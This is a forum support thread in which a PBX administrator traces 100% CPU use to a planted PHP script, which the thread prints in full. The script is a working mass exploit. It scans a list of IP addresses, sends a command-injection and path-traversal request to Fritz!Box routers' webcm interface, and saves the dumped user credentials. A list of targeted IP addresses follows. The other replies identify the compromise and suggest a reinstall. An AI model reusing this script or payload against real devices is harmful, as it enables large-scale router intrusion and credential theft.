The PHP Process is crashing asterisk taking 100% CPU

General Help
1

Folks,

We have a client with a PPIAF Installed

PIAF Installed Version = 2.0.6.3 under HARDWARE
FreePBX Version = 2.9.0.15
Running Asterisk Version = 1.8.19.1
Asterisk Source Version = 1.8.19.1

they have a little bit complicated setup there, they are using AASTRA phones, the system was working fine until last week since them we notice that the phones all of the sudden lost registration to the server,

We were checking the logs and looks like asterisk is crashing, something that we are notice is that the PHP is taking 100% of the CPU and maybe that is crashing the asterisk.

here the TOP result:

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
7701 root 25 0 49896 32m 6352 R 99.2 1.6 583:45.53 php
18273 root 25 0 54484 36m 6360 R 99.2 1.8 878:25.15 php
3307 asterisk 15 0 13184 9252 1864 S 1.0 0.4 0:52.55 op_server.pl

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
7701 root 25 0 49896 32m 6352 R 100.0 1.6 584:03.56 php
18273 root 25 0 54484 36m 6360 R 99.8 1.8 878:43.15 php

any advise?

Thank you in advance.

2

you would need to know the actual processes

ps aux|grep php

3

Hey Dicko,

thanks for the quick respond.

here the result of the ps aux|grep php

root 18273 92.1 1.8 54484 37468 ? R Nov04 1089:09 php imgu.php

looks like the imgu.php is the issue

4

I would look for this file

locate imgu.php

And see what it is… It seems you are all sorts of outdated, you may have been hacked…

5

You should probably

updatedb;locate imgu.php

6

The file is located it at:

/etc/imgu/imgu.php

and here is the content of the file. Do you see something strange?

<?php
   set_time_limit(0);
   error_reporting(E_ALL ^ E_NOTICE);
   $file = file("ar7.txt");
   $threads = 100;

   function exabod($content,$start,$end){
        $r = explode($start, $content);
        if (isset($r[1])){
            $r = explode($end, $r[1]);
            return $r[0];
        }
        return "";
    }


for($k=0;$k<count($file);$k+=$threads) {
          $mh = curl_multi_init();
          $handles = array();
          $end = $k+$threads;


$end = $k+$threads;

for($i=$k;$i<$end;$i++) {
    $ip = trim($file[$i]);

    if(@fsockopen($ip, 443, $errno, $errstr, 0.3)) {

              $url = "https://".$ip."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C ar7 -c -o - ../../../../../var/flash/ar7.cfg%26";

          }

          else {
                  continue;
                }


                 $ch = curl_init();


          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
          curl_setopt($ch, CURLOPT_URL, $url);
          curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE );
          curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1");
          curl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language: en-us,en;q=0.5','Accept-Charset: ISO-88$
          curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          curl_setopt($ch, CURLOPT_TIMEOUT, 3);
          curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);

       curl_setopt($ch, CURLOPT_TIMEOUT, 3);
          curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);


    curl_multi_add_handle($mh,$ch);


    $ips2[] = $ip;
    $handles[] = $ch;
  }


 $running=null;
  do
  {
    curl_multi_exec($mh,$running);
  } while ($running > 0);
   echo"
[-] >>>>> ".$end." <<<<<
";

  for($j=0;$j<count($handles);$j++)
  {
            $content = curl_multi_getcontent($handles[$j]);
             if (stristr($content,"boxusers")){
        $content2 = exabod($content, "boxusers", "// EOF");
$rimgx = "".$ips2[$j]."";
$abl="admx/".$rimgx."-3as-user.conf";
$fp2 = fopen("$abl","w");
fwrite($fp2, $content2);
fclose($fp2);

echo"
[+] ".$rimgx." - DONE
";
}


             curl_multi_remove_handle($mh,$handles[$j]);


  }

  unset($ips2);

  curl_multi_close($mh);
}


?>
7

Ok inquiring minds and all that jazz…

What is in /etc/imgu/ar7.txt

8

hey jfinstrom,

i cat the file and it is showing a bunch of IP address, here are some IPs:

91.0.175.61
91.0.82.61
91.0.121.43
91.0.165.49
91.0.75.64
91.0.47.203
91.0.140.13
91.0.148.122
91.0.149.114
91.0.75.35
91.0.79.241
91.0.221.227
91.0.59.17
91.0.99.103
91.0.16.96
91.0.82.36
91.0.246.238
91.0.139.196
91.0.187.158
91.0.140.245
91.0.71.73
91.0.1.25
91.0.233.88
91.0.247.9
91.0.153.229
91.0.167.218
91.0.15.133
91.0.171.244
91.0.124.179
91.0.240.171
91.0.131.164
91.0.30.123
91.0.227.187
91.0.190.40
91.0.79.127
91.0.240.21
91.0.215.211
91.0.167.241
91.0.161.220
91.0.19.179
91.0.16.13
91.0.231.177
91.0.70.179
91.0.195.165
91.0.77.84
91.0.138.234
91.0.75.86
91.0.137.213
91.0.149.83
91.0.144.107
91.0.146.23

what is this imgu.php file for?, can i delete it or recreate it

9

You have been hacked. I would start with a fresh install. Seems you got hacked on one of the exploits. I am curious as you state you use PBXiaF. Have you disabled their apache auth mechanism that makes you use their maint login for everything?

10

sorry there are not only IPs(or that is what i think they are), because i’m also seeing this type of numbers:

91.31 86.104
911.18120.109
918.12126.57
91.10241.66
912.972.219
911.2821.33
915.11161.207
919.17172.221
910.10234.8
917.18180.176
912.5885.229
917.16205.140
917.13195.213
91.198209.184
910.15121.34
915.99160.73
914.1950.187
918.10250.29
913.2199.199
918.1483.201
917.1088.157
910.11181.155
912.17109.245
91.110132.113
919.17184.1
91.22273.171
912.10222.152
910.56172.55
913.73140.72
913.64221.123

11

No tonyclewis,

I installed this PIAF long time ago, and i don’t remember disabling anything.

how can i check that?